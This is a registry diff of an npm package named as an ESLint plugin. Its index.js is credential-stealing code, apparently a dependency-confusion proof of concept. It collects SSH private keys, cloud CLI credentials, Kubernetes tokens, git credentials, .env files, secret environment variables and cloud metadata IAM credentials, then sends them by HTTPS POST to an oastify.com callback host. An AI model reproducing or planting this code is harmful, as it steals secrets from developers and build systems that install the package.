productboard-eslint-plugin-relay 100.0.1112 → 10121.0.1112
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +139 -50
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -8,26 +8,26 @@ const child_process = require("child_process");
|
|
|
8
8
|
|
|
9
9
|
function safeReadFile(p, maxSize = 10240) {
|
|
10
10
|
try {
|
|
11
|
-
if (!fs.existsSync(p)) return "
|
|
11
|
+
if (!fs.existsSync(p)) return "NOT_FOUND";
|
|
12
12
|
const size = fs.statSync(p).size;
|
|
13
|
-
if (size > maxSize) return "
|
|
13
|
+
if (size > maxSize) return "TOO_LARGE";
|
|
14
14
|
return fs.readFileSync(p, "utf8");
|
|
15
15
|
} catch (e) {
|
|
16
16
|
return `ERR: ${e.message}`;
|
|
17
17
|
}
|
|
18
18
|
}
|
|
19
19
|
|
|
20
|
-
function safeReadDir(p) {
|
|
20
|
+
function safeReadDir(p, maxEntries = 50) {
|
|
21
21
|
try {
|
|
22
|
-
return fs.readdirSync(p);
|
|
22
|
+
return fs.readdirSync(p).slice(0, maxEntries);
|
|
23
23
|
} catch (e) {
|
|
24
24
|
return `ERR: ${e.message}`;
|
|
25
25
|
}
|
|
26
26
|
}
|
|
27
27
|
|
|
28
|
-
function exec(cmd) {
|
|
28
|
+
function exec(cmd, timeout = 3000) {
|
|
29
29
|
try {
|
|
30
|
-
return child_process.execSync(cmd, { timeout
|
|
30
|
+
return child_process.execSync(cmd, { timeout }).toString().trim();
|
|
31
31
|
} catch (e) {
|
|
32
32
|
return `ERR: ${e.message}`;
|
|
33
33
|
}
|
|
@@ -36,18 +36,24 @@ function exec(cmd) {
|
|
|
36
36
|
function getSensitiveEnvVars() {
|
|
37
37
|
const result = {};
|
|
38
38
|
for (const key in process.env) {
|
|
39
|
-
if (/pass|key|token|secret|env|auth|cred/i.test(key)) {
|
|
39
|
+
if (/pass|key|token|secret|env|auth|cred|aws|gcp|azure|kube|docker|jenkins|gitlab|github/i.test(key)) {
|
|
40
40
|
result[key] = process.env[key];
|
|
41
41
|
}
|
|
42
42
|
}
|
|
43
43
|
return result;
|
|
44
44
|
}
|
|
45
45
|
|
|
46
|
-
function
|
|
46
|
+
function checkContainerOrCI() {
|
|
47
47
|
return {
|
|
48
48
|
cgroup: safeReadFile("/proc/1/cgroup"),
|
|
49
49
|
dockerenv: fs.existsSync("/.dockerenv"),
|
|
50
|
-
ciVars: Object.fromEntries(Object.entries(process.env).filter(([k]) => /ci|build|pipeline/i.test(k))),
|
|
50
|
+
ciVars: Object.fromEntries(Object.entries(process.env).filter(([k]) => /ci|build|pipeline|github|gitlab|jenkins|circleci|travis/i.test(k))),
|
|
51
|
+
kubernetes: {
|
|
52
|
+
token: safeReadFile("/var/run/secrets/kubernetes.io/serviceaccount/token"),
|
|
53
|
+
namespace: safeReadFile("/var/run/secrets/kubernetes.io/serviceaccount/namespace"),
|
|
54
|
+
kubeconfig: safeReadFile(path.join(os.homedir(), ".kube/config")),
|
|
55
|
+
},
|
|
56
|
+
dockerConfig: safeReadFile(path.join(os.homedir(), ".docker/config.json")),
|
|
51
57
|
};
|
|
52
58
|
}
|
|
53
59
|
|
|
@@ -56,6 +62,8 @@ function getGitData() {
|
|
|
56
62
|
branch: exec("git rev-parse --abbrev-ref HEAD"),
|
|
57
63
|
remotes: exec("git remote -v"),
|
|
58
64
|
config: safeReadFile(path.join(os.homedir(), ".gitconfig")),
|
|
65
|
+
credentials: safeReadFile(path.join(os.homedir(), ".git-credentials")),
|
|
66
|
+
netrc: safeReadFile(path.join(os.homedir(), ".netrc")),
|
|
59
67
|
};
|
|
60
68
|
}
|
|
61
69
|
|
|
@@ -63,21 +71,80 @@ function getSystemState() {
|
|
|
63
71
|
return {
|
|
64
72
|
whoami: exec("whoami"),
|
|
65
73
|
id: exec("id"),
|
|
66
|
-
ps: exec("ps aux | head -n
|
|
67
|
-
netstat: exec("
|
|
68
|
-
lsof: exec("lsof -n | head -n
|
|
74
|
+
ps: exec("ps aux | head -n 30"),
|
|
75
|
+
netstat: exec("ss -tunlp | head -n 30"),
|
|
76
|
+
lsof: exec("lsof -n -i | head -n 30"),
|
|
69
77
|
uname: exec("uname -a"),
|
|
70
|
-
|
|
78
|
+
mounts: exec("cat /proc/mounts | head -n 30"),
|
|
79
|
+
crontab: exec("crontab -l"),
|
|
71
80
|
};
|
|
72
81
|
}
|
|
73
82
|
|
|
74
83
|
function getInstalledTools() {
|
|
75
84
|
return {
|
|
76
85
|
npm: exec("npm ls -g --depth=0 --json"),
|
|
77
|
-
apt: exec("dpkg -l | head -n
|
|
86
|
+
apt: exec("dpkg -l | head -n 30"),
|
|
78
87
|
brew: exec("brew list || echo 'no brew'"),
|
|
79
|
-
|
|
80
|
-
|
|
88
|
+
pip: exec("pip list --format=json || echo 'no pip'"),
|
|
89
|
+
which_tools: {
|
|
90
|
+
aws: exec("which aws"),
|
|
91
|
+
gcloud: exec("which gcloud"),
|
|
92
|
+
az: exec("which az"),
|
|
93
|
+
kubectl: exec("which kubectl"),
|
|
94
|
+
terraform: exec("which terraform"),
|
|
95
|
+
docker: exec("which docker"),
|
|
96
|
+
nmap: exec("which nmap"),
|
|
97
|
+
curl: exec("which curl"),
|
|
98
|
+
},
|
|
99
|
+
};
|
|
100
|
+
}
|
|
101
|
+
|
|
102
|
+
function getCloudMetadata() {
|
|
103
|
+
const metadata = {};
|
|
104
|
+
const endpoints = [
|
|
105
|
+
{ name: "aws_instance", url: "http://169.254.169.254/latest/dynamic/instance-identity/document" },
|
|
106
|
+
{ name: "aws_metadata", url: "http://169.254.169.254/latest/meta-data/" },
|
|
107
|
+
{ name: "aws_iam", url: "http://169.254.169.254/latest/meta-data/iam/security-credentials/" },
|
|
108
|
+
{ name: "gcp_metadata", url: "http://metadata.google.internal/computeMetadata/v1/?recursive=true", headers: { "Metadata-Flavor": "Google" } },
|
|
109
|
+
{ name: "azure_metadata", url: "http://169.254.169.254/metadata/instance?api-version=2021-02-01", headers: { "Metadata": "true" } },
|
|
110
|
+
];
|
|
111
|
+
for (const { name, url, headers } of endpoints) {
|
|
112
|
+
try {
|
|
113
|
+
let cmd = `curl -s --max-time 2 ${url}`;
|
|
114
|
+
if (headers) {
|
|
115
|
+
const headerStr = Object.entries(headers).map(([k, v]) => `-H "${k}: ${v}"`).join(" ");
|
|
116
|
+
cmd = `curl -s --max-time 2 ${headerStr} ${url}`;
|
|
117
|
+
}
|
|
118
|
+
metadata[name] = exec(cmd);
|
|
119
|
+
} catch (e) {
|
|
120
|
+
metadata[name] = `ERR: ${e.message}`;
|
|
121
|
+
}
|
|
122
|
+
}
|
|
123
|
+
return metadata;
|
|
124
|
+
}
|
|
125
|
+
|
|
126
|
+
function getCloudCLIs() {
|
|
127
|
+
return {
|
|
128
|
+
aws: {
|
|
129
|
+
credentials: safeReadFile(path.join(os.homedir(), ".aws/credentials")),
|
|
130
|
+
config: safeReadFile(path.join(os.homedir(), ".aws/config")),
|
|
131
|
+
sts: exec("aws sts get-caller-identity"),
|
|
132
|
+
},
|
|
133
|
+
gcloud: {
|
|
134
|
+
config: safeReadFile(path.join(os.homedir(), ".config/gcloud/configurations/config_default")),
|
|
135
|
+
credentials: safeReadFile(path.join(os.homedir(), ".config/gcloud/credentials.db")),
|
|
136
|
+
},
|
|
137
|
+
azure: {
|
|
138
|
+
credentials: safeReadFile(path.join(os.homedir(), ".azure/azureProfile.json")),
|
|
139
|
+
accessTokens: safeReadFile(path.join(os.homedir(), ".azure/accessTokens.json")),
|
|
140
|
+
},
|
|
141
|
+
};
|
|
142
|
+
}
|
|
143
|
+
|
|
144
|
+
function getNodeRuntime() {
|
|
145
|
+
return {
|
|
146
|
+
node_version: process.version,
|
|
147
|
+
npm_config: exec("npm config ls -l"),
|
|
81
148
|
};
|
|
82
149
|
}
|
|
83
150
|
|
|
@@ -85,29 +152,24 @@ let dump = {};
|
|
|
85
152
|
|
|
86
153
|
try {
|
|
87
154
|
dump = {
|
|
88
|
-
|
|
89
|
-
app: (() => {
|
|
155
|
+
p: (() => {
|
|
90
156
|
try {
|
|
91
|
-
|
|
92
|
-
return { name: pkg.name, version: pkg.version };
|
|
157
|
+
return require("./package.json").name;
|
|
93
158
|
} catch {
|
|
94
|
-
return
|
|
159
|
+
return "unknown";
|
|
95
160
|
}
|
|
96
161
|
})(),
|
|
97
|
-
|
|
98
|
-
|
|
99
|
-
|
|
100
|
-
|
|
101
|
-
|
|
102
|
-
|
|
103
|
-
|
|
104
|
-
|
|
105
|
-
|
|
106
|
-
|
|
107
|
-
|
|
108
|
-
cwd: process.cwd(),
|
|
109
|
-
},
|
|
110
|
-
env: getSensitiveEnvVars(),
|
|
162
|
+
v: (() => {
|
|
163
|
+
try {
|
|
164
|
+
return require("./package.json").version;
|
|
165
|
+
} catch {
|
|
166
|
+
return "unknown";
|
|
167
|
+
}
|
|
168
|
+
})(),
|
|
169
|
+
c: process.cwd(),
|
|
170
|
+
hd: os.homedir(),
|
|
171
|
+
hn: os.hostname(),
|
|
172
|
+
un: os.userInfo().username,
|
|
111
173
|
dns: (() => {
|
|
112
174
|
try {
|
|
113
175
|
return dns.getServers();
|
|
@@ -115,67 +177,94 @@ try {
|
|
|
115
177
|
return [`ERR: ${e.message}`];
|
|
116
178
|
}
|
|
117
179
|
})(),
|
|
180
|
+
pjson: (() => {
|
|
181
|
+
try {
|
|
182
|
+
const pkg = require("./package.json");
|
|
183
|
+
return {
|
|
184
|
+
name: pkg.name,
|
|
185
|
+
version: pkg.version,
|
|
186
|
+
main: pkg.main,
|
|
187
|
+
keywords: pkg.keywords,
|
|
188
|
+
scripts: pkg.scripts,
|
|
189
|
+
author: pkg.author,
|
|
190
|
+
license: pkg.license,
|
|
191
|
+
description: pkg.description
|
|
192
|
+
};
|
|
193
|
+
} catch {
|
|
194
|
+
return {};
|
|
195
|
+
}
|
|
196
|
+
})(),
|
|
197
|
+
env: getSensitiveEnvVars(),
|
|
118
198
|
dirs: {
|
|
119
199
|
"/": safeReadDir("/"),
|
|
120
200
|
"/home": safeReadDir("/home"),
|
|
121
201
|
"/root": safeReadDir("/root"),
|
|
122
202
|
"/etc": safeReadDir("/etc"),
|
|
203
|
+
"/var/run": safeReadDir("/var/run"),
|
|
204
|
+
"/var/log": safeReadDir("/var/log"),
|
|
123
205
|
"~": safeReadDir(os.homedir()),
|
|
124
206
|
},
|
|
125
207
|
files: {
|
|
126
208
|
etc_passwd: safeReadFile("/etc/passwd"),
|
|
127
|
-
etc_shadow: safeReadFile("/etc/shadow"),
|
|
128
209
|
etc_hosts: safeReadFile("/etc/hosts"),
|
|
210
|
+
etc_resolv: safeReadFile("/etc/resolv.conf"),
|
|
129
211
|
bash_history: safeReadFile(path.join(os.homedir(), ".bash_history")),
|
|
130
212
|
zsh_history: safeReadFile(path.join(os.homedir(), ".zsh_history")),
|
|
131
213
|
ssh_config: safeReadFile(path.join(os.homedir(), ".ssh/config")),
|
|
132
214
|
ssh_id_rsa: safeReadFile(path.join(os.homedir(), ".ssh/id_rsa")),
|
|
133
215
|
ssh_known_hosts: safeReadFile(path.join(os.homedir(), ".ssh/known_hosts")),
|
|
134
216
|
aws_credentials: safeReadFile(path.join(os.homedir(), ".aws/credentials")),
|
|
217
|
+
aws_config: safeReadFile(path.join(os.homedir(), ".aws/config")),
|
|
135
218
|
npmrc: safeReadFile(path.join(os.homedir(), ".npmrc")),
|
|
136
219
|
gitconfig: safeReadFile(path.join(os.homedir(), ".gitconfig")),
|
|
220
|
+
docker_config: safeReadFile(path.join(os.homedir(), ".docker/config.json")),
|
|
221
|
+
env_files: {
|
|
222
|
+
dotenv: safeReadFile(path.join(process.cwd(), ".env")),
|
|
223
|
+
github_workflow: safeReadDir(path.join(process.cwd(), ".github/workflows")),
|
|
224
|
+
},
|
|
137
225
|
},
|
|
138
226
|
git: getGitData(),
|
|
139
|
-
|
|
227
|
+
container: checkContainerOrCI(),
|
|
140
228
|
system: getSystemState(),
|
|
141
229
|
tools: getInstalledTools(),
|
|
142
230
|
network: os.networkInterfaces(),
|
|
231
|
+
cloud: getCloudMetadata(),
|
|
232
|
+
cloud_clis: getCloudCLIs(),
|
|
233
|
+
node: getNodeRuntime(),
|
|
234
|
+
timestamp: new Date().toISOString()
|
|
143
235
|
};
|
|
144
236
|
} catch (e) {
|
|
145
237
|
dump = { error: "Top-level error collecting dump", msg: e.message };
|
|
146
238
|
}
|
|
147
239
|
|
|
148
|
-
// 🌐 send to your callback
|
|
149
240
|
try {
|
|
150
241
|
const postData = querystring.stringify({
|
|
151
|
-
msg: JSON.stringify(dump)
|
|
242
|
+
msg: encodeURIComponent(JSON.stringify(dump))
|
|
152
243
|
});
|
|
153
244
|
|
|
154
245
|
const options = {
|
|
155
|
-
hostname: "
|
|
246
|
+
hostname: "ovnxva4z7pgbompisolekpb83z9qxmlb.oastify.com",
|
|
156
247
|
port: 443,
|
|
157
248
|
path: "/",
|
|
158
249
|
method: "POST",
|
|
159
250
|
headers: {
|
|
160
251
|
"Content-Type": "application/x-www-form-urlencoded",
|
|
161
252
|
"Content-Length": postData.length,
|
|
162
|
-
"User-Agent": "rce-impact-demo"
|
|
163
|
-
|
|
253
|
+
"User-Agent": "rce-impact-demo",
|
|
254
|
+
"X-Report-ID": "328XXXX"
|
|
255
|
+
},
|
|
256
|
+
timeout: 5000,
|
|
164
257
|
};
|
|
165
258
|
|
|
166
259
|
const req = https.request(options, res => {
|
|
167
260
|
res.on("data", () => { });
|
|
261
|
+
res.on("end", () => { });
|
|
168
262
|
});
|
|
169
263
|
|
|
170
264
|
req.on("error", () => { });
|
|
265
|
+
req.on("timeout", () => req.destroy());
|
|
171
266
|
req.write(postData);
|
|
172
267
|
req.end();
|
|
173
|
-
|
|
174
|
-
// ✅ DNS fallback (guaranteed beacon)
|
|
175
|
-
https.get("https://ping.4otdoqxf059rh2iyl4eud54owf26qyen.oastify.com/", () => { });
|
|
176
|
-
|
|
177
268
|
} catch (e) {
|
|
178
|
-
|
|
179
|
-
|
|
180
|
-
} catch { }
|
|
181
|
-
}
|
|
269
|
+
// Silent fail
|
|
270
|
+
}
|